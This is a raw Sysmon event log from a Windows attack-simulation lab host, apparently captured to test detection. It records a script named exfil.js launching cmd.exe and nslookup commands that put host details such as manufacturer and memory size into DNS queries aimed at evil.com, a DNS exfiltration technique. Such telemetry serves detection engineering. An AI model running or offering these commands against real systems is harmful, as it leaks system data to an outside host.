14:16:25.765{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.765{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.765{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.765{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-C03F-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.765{2E1864BB-17A1-629A-783D-000000005F02}55522384C:\Windows\System32\WScript.exe{2E1864BB-17B9-629A-C03F-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.765{2E1864BB-17B9-629A-C03F-000000005F02}2692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkxja.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.750{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhehnq.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.734{2E1864BB-17B9-629A-BE3F-000000005F02}5440300C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-BF3F-000000005F02}4296C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.734{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.734{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.734{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.734{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.734{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-BF3F-000000005F02}4296C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.734{2E1864BB-17B9-629A-BD3F-000000005F02}34525000C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-BF3F-000000005F02}4296C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.737{2E1864BB-17B9-629A-BF3F-000000005F02}4296C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B9-629A-BD3F-000000005F02}3452C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhehnq.tmp 2>&1 10341000x8000000000000000198694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.718{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-BE3F-000000005F02}5440C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.718{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-BE3F-000000005F02}5440C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.703{2E1864BB-17B9-629A-BE3F-000000005F02}5440300C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-BD3F-000000005F02}3452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.703{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-BE3F-000000005F02}5440C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.703{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.703{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.702{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.701{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.701{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-BD3F-000000005F02}3452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.701{2E1864BB-17A1-629A-783D-000000005F02}55522736C:\Windows\System32\WScript.exe{2E1864BB-17B9-629A-BD3F-000000005F02}3452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.700{2E1864BB-17B9-629A-BD3F-000000005F02}3452C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhehnq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000198683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.387{00000000-0000-0000-0000-000000000000}1144evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.291{00000000-0000-0000-0000-000000000000}7628evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.202{00000000-0000-0000-0000-000000000000}8132evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.078{00000000-0000-0000-0000-000000000000}6892evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.943{00000000-0000-0000-0000-000000000000}4848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.855{00000000-0000-0000-0000-000000000000}2328evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.782{00000000-0000-0000-0000-000000000000}3976evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.700{00000000-0000-0000-0000-000000000000}1908evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.610{00000000-0000-0000-0000-000000000000}2256evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000198674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.681{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpca.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.681{2E1864BB-17B9-629A-BB3F-000000005F02}40607364C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-BC3F-000000005F02}7788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.665{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 